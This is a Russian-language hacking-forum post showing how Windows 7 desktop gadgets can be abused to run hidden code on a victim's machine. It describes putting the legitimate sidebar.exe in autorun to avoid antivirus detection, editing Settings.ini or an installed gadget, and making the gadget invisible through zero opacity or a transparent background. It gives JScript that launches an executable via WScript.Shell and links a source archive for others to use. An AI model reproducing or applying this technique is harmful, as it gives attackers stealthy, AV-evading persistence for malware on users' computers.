Скрыть объявление
Для безопасных сделок с продавцами рекомендуем пользоваться Гарант сервисом

Win7 Gadget's

Тема в разделе "Флейм", создана пользователем Eminence, 20/4/14.

  1. Eminence

    Eminence dark-service.xyz
    VIP

    Сообщения:
    1.001
    Симпатии:
    275
    В один прекрасный день я заинтересовался как устроены виндовые гаджеты изнутри.
    Гаджет - это такая хрень которая появилась в win7, можно поставить красивые часики или чекер погоды.

    [​IMG]

    Ну вы поняли.

    Итак, что же них интересного? Дело в том, что гаджет это html страничка, использующая css и поддерживающая VBA и JScript (не путать с браузерным обрезком).
    2 этих скриптовых языка имею весьма широкое применение.

    Подробности:

    В win7 существует файл "C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Settings.ini", он отвечает за настройки "sidebar.exe".
    Когда вы перетаскиваете гаджет на рабочий стол, в этот файл записываются его настройки, а в реестр прописывается:
    Код:
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run] "Sidebar"="C:\\Program Files\\Windows Sidebar\\sidebar.exe /autoRun" Settings.ini Имеет достаточно банальную структуру, [Section 1] PrivateSetting_GadgetName="путь до папки с гаджетом" PrivateSetting_GadgetOpacity="100" - непрозрачность, установите её в ноль и гаджет станет невидим. [Hashes] - видимо контрольная сумма, мне кажется это превентивная мера от вирусов, но я не замечал что бы win7 ругалась при её отсутствии.

    Инсталляция:
    Стандартные гаджеты лежат в "C:\Program Files\Windows Sidebar\Gadgets", но новые складываются в "C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets"

    Собственно тут напрашивается метод эксплуатации:
    1) ставим на авторан "sidebar.exe" - он легален и ав не будет реагировать.
    2 )меняем "Settings.ini" или код уже установленного гаджета

    Перейдём к практике:

    Я взял чей-то гаджет и выкинул из него половину мусора, остался только рабочий каркас.
    При запуске sidebar отрисовывал белое поле, даже если html был пустой.

    Примерно так:
    [​IMG]
    Тут 2 варианта сокрытия, либо установить непрозрачность в ноль, либо поставить на фон через JS прозрачное изображение.
    Код:
    bd=document.body.style; bd.width=36; bd.height=36; bd.background='url(images/00.png) no-repeat';

    Я намерено увеличил размер до 36, хотя в моём случае размер прозрачного изображения 32 на 32:
    [​IMG]

    Если Изображение полностью прозрачно, то на него нельзя навести курсор и соотвественно менюшка не появится (!).

    И наконец, самое вкусное: как всё это эксплуатировать.
    Код:
    var WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run ("\\test.exe",1);

    Прикладываю исходники, развлекайтесь.
    [​IMG]
    https://www.dropbox.com/s/7q4geyclgru8mr8/en-US.zip
     

Поделиться этой страницей